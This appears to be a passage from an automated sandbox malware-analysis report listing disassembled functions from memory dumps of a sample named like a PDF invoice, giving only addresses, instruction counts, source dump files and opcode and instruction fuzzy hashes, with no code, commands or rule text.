                                                                                      • Instruction ID: 8c89f46d6cdd9b70fddbcb3086685274229b428af87df56f94bf54b7c27c6542
                                                                                      • Opcode Fuzzy Hash: 4f7e9cee57c1922af8e2a2c50b974cbf0480fdd89a8249fc983cc5879b244192
                                                                                      • Instruction Fuzzy Hash: B1A11C34A002148FDB94DF25C898BADBBB2BF89300F5485A8E94AAB355DF30DD85DF50
                                                                                      Function 06766B90 Relevance: .2, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3eadb105c0211ead7e69db1b02bd97b5406126afea85c98ad0c87c01d9d64718
                                                                                      • Instruction ID: fbff619b125718ff8d11f602be83f5a334f223fd846815ee5e986046e2dd0180
                                                                                      • Opcode Fuzzy Hash: 3eadb105c0211ead7e69db1b02bd97b5406126afea85c98ad0c87c01d9d64718
                                                                                      • Instruction Fuzzy Hash: 779141307106149FCB84DF69D898A6D7BB6BF89710F5481A9F906DB3A5CB30DC41CB91
                                                                                      Function 066AC7A8 Relevance: .2, Instructions: 217COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aa54767abf7707f2cf11928c5539fa383545c33877838718fb34ad3d70b7b96e
                                                                                      • Instruction ID: 87393e53e73288d854228f86bfb04b56a27cd0e9352b69cd34c345ef8238df87
                                                                                      • Opcode Fuzzy Hash: aa54767abf7707f2cf11928c5539fa383545c33877838718fb34ad3d70b7b96e
                                                                                      • Instruction Fuzzy Hash: CA815735A013089FDB94CFA8E994AADBBF2BF88301F148069E911AB391CB35DD45DF50
                                                                                      Function 065CE54E Relevance: .2, Instructions: 181COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d7bbac17f42489553a4794fe0b5e4b95176ab5bcb9e0b7006c09f4f760d36048
                                                                                      • Instruction ID: fc386253189ea05aa1867c2c7c63f7e16abaf59d2a7845eee44732e9e0e5e02f
                                                                                      • Opcode Fuzzy Hash: d7bbac17f42489553a4794fe0b5e4b95176ab5bcb9e0b7006c09f4f760d36048
                                                                                      • Instruction Fuzzy Hash: 01712938A00614CFCB64DFA8C585A5DBBF5FF48760B2585A9E8069B762DB30ED42CF50
                                                                                      Function 06766B80 Relevance: .2, Instructions: 169COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a96644883ca3b7bedb85cc39975f684670f1f21d8f3ea5dbbff08df9484a493f
                                                                                      • Instruction ID: 8d71f1ac8208b28350b0ad39d7673cc2fb6bc5833384a7579f7b2f432462107e
                                                                                      • Opcode Fuzzy Hash: a96644883ca3b7bedb85cc39975f684670f1f21d8f3ea5dbbff08df9484a493f
                                                                                      • Instruction Fuzzy Hash: FD612B34B10604DFCB84DF69D898A6DB7B6BF89710F658168F9169B361CB30EC41CB91
                                                                                      Function 00D717EF Relevance: .2, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 94c18d2422abb0803eaa8ac2c5b7e1b022b037a67722bf10161f8576eb2d037e
                                                                                      • Instruction ID: 02f7736b087beebdd52397e451936c9992b2bd2c68a16143f5afdb4aa62dd6d3
                                                                                      • Opcode Fuzzy Hash: 94c18d2422abb0803eaa8ac2c5b7e1b022b037a67722bf10161f8576eb2d037e
                                                                                      • Instruction Fuzzy Hash: 0F618D38A00104DFD744DB28D458BA97BF3FF89314F28C2A5E5099B769EB309C86DB61
                                                                                      Function 065C8A09 Relevance: .2, Instructions: 155COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a6ad305c466232b2132d7dd365b85b2fcf4a4caf0df9bfc992bf1ed43ee2ef9
                                                                                      • Instruction ID: f19b01461dd18c88f50549e523fa1e40d2bdcbc053a297946bd1fb24d644c53f
                                                                                      • Opcode Fuzzy Hash: 4a6ad305c466232b2132d7dd365b85b2fcf4a4caf0df9bfc992bf1ed43ee2ef9
                                                                                      • Instruction Fuzzy Hash: BB5139B4D05208DFCB44CF98C940AAEBBF5FB89320F1485AAD408E7391D735AA41CFA1
                                                                                      Function 00D71800 Relevance: .2, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82c5673d4decc575c915c7527b953084be790ef07b63a6b2ce4f6e838058059d
                                                                                      • Instruction ID: 1cb5c9e5978a12429e48ae1f7acf828f57bb14974aac8a1cef849f8a746950f1
                                                                                      • Opcode Fuzzy Hash: 82c5673d4decc575c915c7527b953084be790ef07b63a6b2ce4f6e838058059d
                                                                                      • Instruction Fuzzy Hash: 6C516C39A10104DFD744DB29D458BA977F3FF88314F28C2A5E50A9B364EB309C86DB61
                                                                                      Function 067618D8 Relevance: .1, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a821e9e10308df2343045ffa8fb1990bbb6d420b3931313fd53f24017e8c0268
                                                                                      • Instruction ID: e3ce06ea6dfbd9b220d3778291ebfd9b01a2978adeb01fbc1f334f12112f7872
                                                                                      • Opcode Fuzzy Hash: a821e9e10308df2343045ffa8fb1990bbb6d420b3931313fd53f24017e8c0268
                                                                                      • Instruction Fuzzy Hash: 57515134B006099FCB44EF65E898AAD7BB6FFC9701F008119E902973A4DF70994ADB91
                                                                                      Function 06766E83 Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 284462d09b9698f1f99976672be204edd68abbc2ffb8834e9a6ddf0252aea96d
                                                                                      • Instruction ID: 90bd61e29073fb84152f3fc35e50d06b1b76cea168d282044324b0d12862dcfa
                                                                                      • Opcode Fuzzy Hash: 284462d09b9698f1f99976672be204edd68abbc2ffb8834e9a6ddf0252aea96d
                                                                                      • Instruction Fuzzy Hash: C3417D35A002089FCF55DBA6DC54AEEBBB1FF89311F148066E801BB3A5DA359D05CBA1
                                                                                      Function 06769EB8 Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2261c4e679d3f3041768e24c4ae70ce15e8000e85f2f4cdbdf2580a902991c2
                                                                                      • Instruction ID: bf192efc1456f626347a771dd92912b049fbd775fb4264fd163b061bcaae5784
                                                                                      • Opcode Fuzzy Hash: d2261c4e679d3f3041768e24c4ae70ce15e8000e85f2f4cdbdf2580a902991c2
                                                                                      • Instruction Fuzzy Hash: FB419E31A007459FCB61CF6AC944AAABBF2FF88300F198959FA8697A51D730F905CF51
                                                                                      Function 06769FFF Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b7b43039b13142a7a7d69714f044295e5c749319ecbfd3a4dec6b9357abcded
                                                                                      • Instruction ID: 3721882a5ef79434f1a16ce5fe9710cf0c6f21c1ebaeecf1b506f49205302d50
                                                                                      • Opcode Fuzzy Hash: 8b7b43039b13142a7a7d69714f044295e5c749319ecbfd3a4dec6b9357abcded
                                                                                      • Instruction Fuzzy Hash: 4D41EC30F00704AFCB559F69C8447AEBBF6EF85710F108569F956EB290DB31A905CB91
                                                                                      Function 066ACEC8 Relevance: .1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3da8cdb53127ce265012546cefc5219d38fcf1381d54ac6c30ae6e1634b2844c
                                                                                      • Instruction ID: fc7a9899271830fcb2c030468d15f3d41dca497c3da3cb714e6625748c9f7cb8
                                                                                      • Opcode Fuzzy Hash: 3da8cdb53127ce265012546cefc5219d38fcf1381d54ac6c30ae6e1634b2844c
                                                                                      • Instruction Fuzzy Hash: CA411870A002059FDB649F68D895BAABBF2FF88704F14846DE9069B345DB31E841DF94
                                                                                      Function 067644A0 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 53f7fc3acb8b996d1bb0a36b40a943cc5ce9f1fa508a620ff5404a689fbfa400
                                                                                      • Instruction ID: a8e4cc516233b8012857b32c30a3abab5daf788dde1a080697e019305ebc763c
                                                                                      • Opcode Fuzzy Hash: 53f7fc3acb8b996d1bb0a36b40a943cc5ce9f1fa508a620ff5404a689fbfa400
                                                                                      • Instruction Fuzzy Hash: 0C311936A101049FCB45CF69D888EA9BBB2FF49710B0680A9F9099F276C731DD55DB40
                                                                                      Function 00D71A5B Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 20e68a544641f7567ca9d2ffd72022f60de988f093dd5bdde18c1e6e636b2623
                                                                                      • Instruction ID: 408303d73c4ce772b600852577c8e1fc1a73bfa4292d34d572dbe4c874582359
                                                                                      • Opcode Fuzzy Hash: 20e68a544641f7567ca9d2ffd72022f60de988f093dd5bdde18c1e6e636b2623
                                                                                      • Instruction Fuzzy Hash: 0041A334600114DFCB159B6CD4447AD77E3FBC6301F188668D00A8B795EB759D8ACBA1
                                                                                      Function 06764450 Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a002061a255710a77848389bfb5fb8553bf9ee3d4e63fe6541332d7f33251365
                                                                                      • Instruction ID: 34950fcab13f79822b10a1cdb8cada00e7f3dafa62473612b472d9872cb64b0b
                                                                                      • Opcode Fuzzy Hash: a002061a255710a77848389bfb5fb8553bf9ee3d4e63fe6541332d7f33251365
                                                                                      • Instruction Fuzzy Hash: B6318D366002049FCB09CFA9D948DA9BBF6FF49710B0584A9FA09DB272D771EC41CB40
                                                                                      Function 067644B0 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c297f865b28aee0db5d2a198eabd017839e089c044bb22832086b48a74e8ab67
                                                                                      • Instruction ID: e716c27a73d82dae98caef61a5788b0d234c6cbd34c73b0fb0fcbb8ec0cd73a1
                                                                                      • Opcode Fuzzy Hash: c297f865b28aee0db5d2a198eabd017839e089c044bb22832086b48a74e8ab67
                                                                                      • Instruction Fuzzy Hash: 7831F536A101049FCB45DF59D888EA9BBB2FF49320B1680A9FA099B372C731ED55DB40
                                                                                      Function 066AD058 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e09c5497591f33ce7d1bcfceddd536ceba2c3361ae5e2b0905399d2788829896
                                                                                      • Instruction ID: 6c75d3873ac7dcffb49d2778311eaa637273657833449fb2a744b07c905d5fe5
                                                                                      • Opcode Fuzzy Hash: e09c5497591f33ce7d1bcfceddd536ceba2c3361ae5e2b0905399d2788829896
                                                                                      • Instruction Fuzzy Hash: 3E414771A002198FDB94CFA5C945ABEBBB1FF89314F00842AD915E73A1E734DD59CBA0
                                                                                      Function 066ADA12 Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bfb6f248f32576e709d25cfdc48d27c060cd1a96c8f725743d881d1d76bfed80
                                                                                      • Instruction ID: 848a5b23d3049acc70dc61490ed7151f9ff3eaf33afb475c5028126732e5e528
                                                                                      • Opcode Fuzzy Hash: bfb6f248f32576e709d25cfdc48d27c060cd1a96c8f725743d881d1d76bfed80
                                                                                      • Instruction Fuzzy Hash: 0141D574A112289FEBA4DB24CD91FA9B7B1BF49310F1041D9EA09AB7D1C631ED81CF94
                                                                                      Function 066A7837 Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d231aabe1d011a574cc937ae551a64e93608b114e717ccc5a55c625c30f1d67d
                                                                                      • Instruction ID: b8d326d9710d4266b1bd134c1205f4db4999b0293b6f790c7a338c5c96f71558
                                                                                      • Opcode Fuzzy Hash: d231aabe1d011a574cc937ae551a64e93608b114e717ccc5a55c625c30f1d67d
                                                                                      • Instruction Fuzzy Hash: FF410178E06208AFEB40CF99D944BEEBBF2BB49300F10806AE914A7351C7755E55CFA1
                                                                                      Function 06762678 Relevance: .1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9791d2c8b87aaca7435b4789358e276b71d5a3657d11f710207ae3100b12614a
                                                                                      • Instruction ID: 8074521c625461f03928e0329085f4e153e61041ab798020ca58f862257e3813
                                                                                      • Opcode Fuzzy Hash: 9791d2c8b87aaca7435b4789358e276b71d5a3657d11f710207ae3100b12614a
                                                                                      • Instruction Fuzzy Hash: AA2108323052005FC7A49B6AE89097ABBEAEBC0321715847BF91DC7652DF31EC41C7A0
                                                                                      Function 066A7848 Relevance: .1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9dba177a75fcc32a1c9b99d24903f835d7cb9e69e8f82862b4ecb70c1fd818d2
                                                                                      • Instruction ID: fa811d00316476961dc58685d5d5873d07026347def96f04c5fe9ad1c09c65fe
                                                                                      • Opcode Fuzzy Hash: 9dba177a75fcc32a1c9b99d24903f835d7cb9e69e8f82862b4ecb70c1fd818d2
                                                                                      • Instruction Fuzzy Hash: ED41DF74E06209AFDB44DF99D944BEEBBF2BB49300F108069E914A7350C7755E55CFA0
                                                                                      Function 00D71AE0 Relevance: .1, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e31cfef47dfc96a97d3b29d38ec7c5f119da97ab31b59e391135bc91ff161b8b
                                                                                      • Instruction ID: ee70c820795aa9a0f37892194b55a23a5a398856d689eff214019dcbc7906ffb
                                                                                      • Opcode Fuzzy Hash: e31cfef47dfc96a97d3b29d38ec7c5f119da97ab31b59e391135bc91ff161b8b
                                                                                      • Instruction Fuzzy Hash: 86319E38600114DFCB19DB6CD0447AD77E3FBCA305F188668D00A8B399EB75AD8ADB61
                                                                                      Function 06760C00 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 473dae87759cded745ed4da5f3a8bdd96da314bb9d59b48a13b4b07649aac920
                                                                                      • Instruction ID: 9f0550110b3a7928020d6011175749ea990d36e1f07e2a91763b3736313a6ad1
                                                                                      • Opcode Fuzzy Hash: 473dae87759cded745ed4da5f3a8bdd96da314bb9d59b48a13b4b07649aac920
                                                                                      • Instruction Fuzzy Hash: 71312130A04605EFCB05CF69DA808AAFFB5FF41300B0586AAE90397242D731E886C7E5
                                                                                      Function 066A7A48 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b419f635fc96760c36eccef20369958552fc227ec5962840e0066696d376204c
                                                                                      • Instruction ID: dfb2fe63c65de6c50e23072b389297ffac25350e366894234f027dc09f1ea29c
                                                                                      • Opcode Fuzzy Hash: b419f635fc96760c36eccef20369958552fc227ec5962840e0066696d376204c
                                                                                      • Instruction Fuzzy Hash: B9311178E04209EFDB44DFA9D844AEEBBF2FB89310F149169D514B3254D7709A52CFA0
                                                                                      Function 00D72425 Relevance: .1, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6ee1eb2a3e6e88bdfb2397f73f10e67a91c7b3690e73d9870aa56fd0ef51b5f
                                                                                      • Instruction ID: 9496f1bc33ffa77d47b6f8f010d959084253c12394467f99d8d483bac66e7451
                                                                                      • Opcode Fuzzy Hash: a6ee1eb2a3e6e88bdfb2397f73f10e67a91c7b3690e73d9870aa56fd0ef51b5f
                                                                                      • Instruction Fuzzy Hash: E33135B0D012499FCF24CFA9D994AEEBFF1AF48310F248069E509AB350DB349945CFA0
                                                                                      Function 066A7A38 Relevance: .1, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e9009747b3468f286b27f51b63a8aabd35cf86e7bd196ae3aed418528438939
                                                                                      • Instruction ID: ee6783132ccacf66f16256825ad93c378f14cdaab9f2ee26a154944f349aad08
                                                                                      • Opcode Fuzzy Hash: 3e9009747b3468f286b27f51b63a8aabd35cf86e7bd196ae3aed418528438939
                                                                                      • Instruction Fuzzy Hash: 8D314178E04209EFDB44DFA9D844AEEBBF2BB89300F14816AD514B7354D7709A52CFA0
                                                                                      Function 00D72430 Relevance: .1, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5a389285a735d681ff8a3e3b52415fb04e830c327525b890ea1038e0de13eb5
                                                                                      • Instruction ID: 8f877ed2baeb959493b34273e6c3c1c892137a765610c18635844953380ec8cf
                                                                                      • Opcode Fuzzy Hash: e5a389285a735d681ff8a3e3b52415fb04e830c327525b890ea1038e0de13eb5
                                                                                      • Instruction Fuzzy Hash: 263137B0D002489FCF14CFAAD595AEEBFF5AF48310F248419E509AB350DB749945CFA0
                                                                                      Function 065CFA68 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8e660e7c72a5794bddb9cccdc0d743088708412f949ed7affb94006d8604f98
                                                                                      • Instruction ID: 25365553359a681c245323119b177a893fa43cb366c26f69ae28c196bd11d4cc
                                                                                      • Opcode Fuzzy Hash: c8e660e7c72a5794bddb9cccdc0d743088708412f949ed7affb94006d8604f98
                                                                                      • Instruction Fuzzy Hash: C1312935A00209CFDB54DFA4DA94ADDBBF2FF88314F2045A9E405AB265CB31AD45CFA0
                                                                                      Function 066AB818 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a566d78f04e53e4d291fe46558672390580baf77895bbe7a365c61ca2c8e6561
                                                                                      • Instruction ID: 93ccba4fb44a004a806817b31e5cb93b7d286d8a3ffde851e237a88ed65e222a
                                                                                      • Opcode Fuzzy Hash: a566d78f04e53e4d291fe46558672390580baf77895bbe7a365c61ca2c8e6561
